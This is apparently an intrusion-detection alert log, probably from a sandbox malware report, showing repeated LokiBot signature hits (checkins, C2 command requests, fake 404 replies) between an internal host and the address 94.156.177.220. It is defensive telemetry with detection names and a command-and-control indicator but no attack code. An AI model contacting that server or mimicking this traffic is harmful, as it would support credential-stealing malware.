                                                                                                    2024-10-29T10:13:34.231392+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:35.198941+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:35.198941+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:35.205169+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249183TCP
                                                                                                    2024-10-29T10:13:35.341029+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918494.156.177.22080TCP
                                                                                                    2024-10-29T10:13:35.341029+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918494.156.177.22080TCP
                                                                                                    2024-10-29T10:13:35.341029+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918494.156.177.22080TCP
                                                                                                    2024-10-29T10:13:36.316886+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918494.156.177.22080TCP
                                                                                                    2024-10-29T10:13:36.316886+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918494.156.177.22080TCP
                                                                                                    2024-10-29T10:13:36.322785+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249184TCP
                                                                                                    2024-10-29T10:13:36.463967+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918594.156.177.22080TCP
                                                                                                    2024-10-29T10:13:36.463967+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918594.156.177.22080TCP
                                                                                                    2024-10-29T10:13:36.463967+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918594.156.177.22080TCP
                                                                                                    2024-10-29T10:13:37.422293+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918594.156.177.22080TCP
                                                                                                    2024-10-29T10:13:37.422293+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918594.156.177.22080TCP
                                                                                                    2024-10-29T10:13:37.428185+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249185TCP
                                                                                                    2024-10-29T10:13:37.579761+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918694.156.177.22080TCP
                                                                                                    2024-10-29T10:13:37.579761+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918694.156.177.22080TCP
                                                                                                    2024-10-29T10:13:37.579761+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918694.156.177.22080TCP
                                                                                                    2024-10-29T10:13:38.573554+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918694.156.177.22080TCP
                                                                                                    2024-10-29T10:13:38.573554+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918694.156.177.22080TCP
                                                                                                    2024-10-29T10:13:38.579991+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249186TCP
                                                                                                    2024-10-29T10:13:39.050088+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918794.156.177.22080TCP
                                                                                                    2024-10-29T10:13:39.050088+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918794.156.177.22080TCP
                                                                                                    2024-10-29T10:13:39.050088+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918794.156.177.22080TCP
                                                                                                    2024-10-29T10:13:40.015986+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918794.156.177.22080TCP
                                                                                                    2024-10-29T10:13:40.015986+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918794.156.177.22080TCP
                                                                                                    2024-10-29T10:13:40.022399+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249187TCP
                                                                                                    2024-10-29T10:13:40.170722+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918894.156.177.22080TCP
                                                                                                    2024-10-29T10:13:40.170722+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918894.156.177.22080TCP
                                                                                                    2024-10-29T10:13:40.170722+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918894.156.177.22080TCP
                                                                                                    2024-10-29T10:13:41.200196+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918894.156.177.22080TCP
                                                                                                    2024-10-29T10:13:41.200196+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918894.156.177.22080TCP
                                                                                                    2024-10-29T10:13:41.206442+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249188TCP
                                                                                                    2024-10-29T10:13:41.781266+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:41.781266+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:41.781266+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:42.743368+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:42.743368+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:42.749810+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249189TCP
                                                                                                    2024-10-29T10:13:42.896730+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:42.896730+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:42.896730+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:43.861544+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:43.861544+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:43.867609+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249190TCP
                                                                                                    2024-10-29T10:13:44.993804+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:44.993804+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:44.993804+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:45.944329+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:45.944329+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:45.953294+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249191TCP
                                                                                                    2024-10-29T10:13:46.280841+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:46.280841+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:46.280841+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:47.248135+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:47.248135+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:47.254189+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249192TCP
                                                                                                    2024-10-29T10:13:47.420972+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:47.420972+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:47.420972+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:48.453390+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:48.453390+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:48.459319+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249193TCP
                                                                                                    2024-10-29T10:13:48.603620+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919494.156.177.22080TCP
                                                                                                    2024-10-29T10:13:48.603620+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919494.156.177.22080TCP
                                                                                                    2024-10-29T10:13:48.603620+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919494.156.177.22080TCP
                                                                                                    2024-10-29T10:13:49.623104+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919494.156.177.22080TCP
                                                                                                    2024-10-29T10:13:49.623104+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919494.156.177.22080TCP
                                                                                                    2024-10-29T10:13:49.632627+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249194TCP
                                                                                                    2024-10-29T10:13:49.772798+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919594.156.177.22080TCP
                                                                                                    2024-10-29T10:13:49.772798+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919594.156.177.22080TCP
                                                                                                    2024-10-29T10:13:49.772798+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919594.156.177.22080TCP
                                                                                                    2024-10-29T10:13:50.723463+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919594.156.177.22080TCP
                                                                                                    2024-10-29T10:13:50.723463+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919594.156.177.22080TCP
                                                                                                    2024-10-29T10:13:50.729465+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249195TCP
                                                                                                    2024-10-29T10:13:50.927162+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919694.156.177.22080TCP
                                                                                                    2024-10-29T10:13:50.927162+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919694.156.177.22080TCP
                                                                                                    2024-10-29T10:13:50.927162+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919694.156.177.22080TCP
                                                                                                    2024-10-29T10:13:51.904772+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919694.156.177.22080TCP
                                                                                                    2024-10-29T10:13:51.904772+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919694.156.177.22080TCP
                                                                                                    2024-10-29T10:13:51.910556+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249196TCP
                                                                                                    2024-10-29T10:13:52.047823+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919794.156.177.22080TCP
                                                                                                    2024-10-29T10:13:52.047823+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919794.156.177.22080TCP
                                                                                                    2024-10-29T10:13:52.047823+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919794.156.177.22080TCP
                                                                                                    2024-10-29T10:13:53.014722+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919794.156.177.22080TCP
                                                                                                    2024-10-29T10:13:53.014722+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919794.156.177.22080TCP
                                                                                                    2024-10-29T10:13:53.021306+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249197TCP
                                                                                                    2024-10-29T10:13:53.157010+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919894.156.177.22080TCP
                                                                                                    2024-10-29T10:13:53.157010+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919894.156.177.22080TCP
                                                                                                    2024-10-29T10:13:53.157010+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919894.156.177.22080TCP
                                                                                                    2024-10-29T10:13:54.103754+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919894.156.177.22080TCP
                                                                                                    2024-10-29T10:13:54.103754+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919894.156.177.22080TCP
                                                                                                    2024-10-29T10:13:54.109672+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249198TCP
                                                                                                    2024-10-29T10:13:54.270732+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:54.270732+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:54.270732+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:55.210408+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:55.210408+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919994.156.177.22080TCP
                                                                                                    2024-10-29T10:13:55.216504+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249199TCP
                                                                                                    2024-10-29T10:13:55.369834+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:55.369834+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:55.369834+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:56.379678+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:56.379678+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920094.156.177.22080TCP
                                                                                                    2024-10-29T10:13:56.386317+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249200TCP
                                                                                                    2024-10-29T10:13:56.838879+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:56.838879+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:56.838879+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:57.801392+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:57.801392+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920194.156.177.22080TCP
                                                                                                    2024-10-29T10:13:57.807376+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249201TCP
                                                                                                    2024-10-29T10:13:57.950747+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:57.950747+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:57.950747+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:58.912752+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:58.912752+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920294.156.177.22080TCP
                                                                                                    2024-10-29T10:13:58.919674+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249202TCP
                                                                                                    2024-10-29T10:13:59.074338+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:59.074338+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920394.156.177.22080TCP
                                                                                                    2024-10-29T10:13:59.074338+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920394.156.177.22080TCP
                                                                                                    2024-10-29T10:14:00.044951+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920394.156.177.22080TCP
                                                                                                    2024-10-29T10:14:00.044951+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920394.156.177.22080TCP
                                                                                                    2024-10-29T10:14:00.051018+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249203TCP
                                                                                                    2024-10-29T10:14:00.190441+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920494.156.177.22080TCP
                                                                                                    2024-10-29T10:14:00.190441+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920494.156.177.22080TCP
                                                                                                    2024-10-29T10:14:00.190441+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920494.156.177.22080TCP
                                                                                                    2024-10-29T10:14:01.151093+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920494.156.177.22080TCP
                                                                                                    2024-10-29T10:14:01.151093+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920494.156.177.22080TCP
                                                                                                    2024-10-29T10:14:01.157166+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249204TCP
                                                                                                    2024-10-29T10:14:01.529409+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920594.156.177.22080TCP
                                                                                                    2024-10-29T10:14:01.529409+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920594.156.177.22080TCP
                                                                                                    2024-10-29T10:14:01.529409+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920594.156.177.22080TCP
                                                                                                    2024-10-29T10:14:02.482655+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920594.156.177.22080TCP
                                                                                                    2024-10-29T10:14:02.482655+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920594.156.177.22080TCP
                                                                                                    2024-10-29T10:14:02.488973+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249205TCP
                                                                                                    2024-10-29T10:14:02.711233+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920694.156.177.22080TCP
                                                                                                    2024-10-29T10:14:02.711233+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920694.156.177.22080TCP
                                                                                                    2024-10-29T10:14:02.711233+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920694.156.177.22080TCP
                                                                                                    2024-10-29T10:14:03.669757+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920694.156.177.22080TCP
                                                                                                    2024-10-29T10:14:03.669757+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920694.156.177.22080TCP
                                                                                                    2024-10-29T10:14:03.675547+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249206TCP
                                                                                                    2024-10-29T10:14:04.625906+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920794.156.177.22080TCP
                                                                                                    2024-10-29T10:14:04.625906+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920794.156.177.22080TCP
                                                                                                    2024-10-29T10:14:04.625906+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920794.156.177.22080TCP
                                                                                                    2024-10-29T10:14:05.592235+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920794.156.177.22080TCP
                                                                                                    2024-10-29T10:14:05.592235+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920794.156.177.22080TCP
                                                                                                    2024-10-29T10:14:05.598044+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249207TCP
                                                                                                    2024-10-29T10:14:05.771818+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920894.156.177.22080TCP
                                                                                                    2024-10-29T10:14:05.771818+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920894.156.177.22080TCP
                                                                                                    2024-10-29T10:14:05.771818+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920894.156.177.22080TCP
                                                                                                    2024-10-29T10:14:06.722224+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920894.156.177.22080TCP
                                                                                                    2024-10-29T10:14:06.722224+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920894.156.177.22080TCP
                                                                                                    2024-10-29T10:14:06.728472+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249208TCP
                                                                                                    2024-10-29T10:14:06.869151+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920994.156.177.22080TCP
                                                                                                    2024-10-29T10:14:06.869151+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920994.156.177.22080TCP
                                                                                                    2024-10-29T10:14:06.869151+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920994.156.177.22080TCP
                                                                                                    2024-10-29T10:14:07.836740+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920994.156.177.22080TCP
                                                                                                    2024-10-29T10:14:07.836740+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920994.156.177.22080TCP
                                                                                                    2024-10-29T10:14:07.843381+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249209TCP
                                                                                                    2024-10-29T10:14:08.021965+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921094.156.177.22080TCP
                                                                                                    2024-10-29T10:14:08.021965+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921094.156.177.22080TCP
                                                                                                    2024-10-29T10:14:08.021965+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921094.156.177.22080TCP
                                                                                                    2024-10-29T10:14:09.001649+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921094.156.177.22080TCP
                                                                                                    2024-10-29T10:14:09.001649+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921094.156.177.22080TCP
                                                                                                    2024-10-29T10:14:09.007417+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249210TCP
                                                                                                    2024-10-29T10:14:09.220051+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921194.156.177.22080TCP
                                                                                                    2024-10-29T10:14:09.220051+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921194.156.177.22080TCP
                                                                                                    2024-10-29T10:14:09.220051+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921194.156.177.22080TCP
                                                                                                    2024-10-29T10:14:10.198279+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921194.156.177.22080TCP
                                                                                                    2024-10-29T10:14:10.198279+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921194.156.177.22080TCP
                                                                                                    2024-10-29T10:14:10.204340+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249211TCP
                                                                                                    2024-10-29T10:14:10.347813+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921294.156.177.22080TCP
                                                                                                    2024-10-29T10:14:10.347813+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921294.156.177.22080TCP
                                                                                                    2024-10-29T10:14:10.347813+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921294.156.177.22080TCP
                                                                                                    2024-10-29T10:14:11.307250+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921294.156.177.22080TCP
                                                                                                    2024-10-29T10:14:11.307250+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921294.156.177.22080TCP
                                                                                                    2024-10-29T10:14:11.313087+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249212TCP
                                                                                                    2024-10-29T10:14:11.459902+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921394.156.177.22080TCP
                                                                                                    2024-10-29T10:14:11.459902+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921394.156.177.22080TCP
                                                                                                    2024-10-29T10:14:11.459902+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921394.156.177.22080TCP
                                                                                                    2024-10-29T10:14:12.407984+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921394.156.177.22080TCP
                                                                                                    2024-10-29T10:14:12.407984+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921394.156.177.22080TCP
                                                                                                    2024-10-29T10:14:12.413950+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249213TCP
                                                                                                    2024-10-29T10:14:12.547431+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921494.156.177.22080TCP
                                                                                                    2024-10-29T10:14:12.547431+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921494.156.177.22080TCP
                                                                                                    2024-10-29T10:14:12.547431+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921494.156.177.22080TCP
                                                                                                    2024-10-29T10:14:13.526537+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921494.156.177.22080TCP
                                                                                                    2024-10-29T10:14:13.526537+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921494.156.177.22080TCP
                                                                                                    2024-10-29T10:14:13.532342+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249214TCP
                                                                                                    2024-10-29T10:14:13.671022+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921594.156.177.22080TCP
                                                                                                    2024-10-29T10:14:13.671022+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921594.156.177.22080TCP
                                                                                                    2024-10-29T10:14:13.671022+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921594.156.177.22080TCP
                                                                                                    2024-10-29T10:14:14.647850+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921594.156.177.22080TCP
                                                                                                    2024-10-29T10:14:14.647850+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921594.156.177.22080TCP
                                                                                                    2024-10-29T10:14:14.653733+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249215TCP
                                                                                                    2024-10-29T10:14:14.801048+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921694.156.177.22080TCP
                                                                                                    2024-10-29T10:14:14.801048+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921694.156.177.22080TCP
                                                                                                    2024-10-29T10:14:14.801048+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921694.156.177.22080TCP
                                                                                                    2024-10-29T10:14:15.776767+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921694.156.177.22080TCP
                                                                                                    2024-10-29T10:14:15.776767+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921694.156.177.22080TCP
                                                                                                    2024-10-29T10:14:15.782689+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249216TCP
                                                                                                    2024-10-29T10:14:15.922364+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921794.156.177.22080TCP
                                                                                                    2024-10-29T10:14:15.922364+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921794.156.177.22080TCP
                                                                                                    2024-10-29T10:14:15.922364+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921794.156.177.22080TCP
                                                                                                    2024-10-29T10:14:16.895264+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921794.156.177.22080TCP
                                                                                                    2024-10-29T10:14:16.895264+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921794.156.177.22080TCP
                                                                                                    2024-10-29T10:14:16.902025+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249217TCP
                                                                                                    2024-10-29T10:14:17.265733+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921894.156.177.22080TCP
                                                                                                    2024-10-29T10:14:17.265733+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921894.156.177.22080TCP
                                                                                                    2024-10-29T10:14:17.265733+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921894.156.177.22080TCP
                                                                                                    2024-10-29T10:14:18.229887+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921894.156.177.22080TCP
                                                                                                    2024-10-29T10:14:18.229887+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921894.156.177.22080TCP
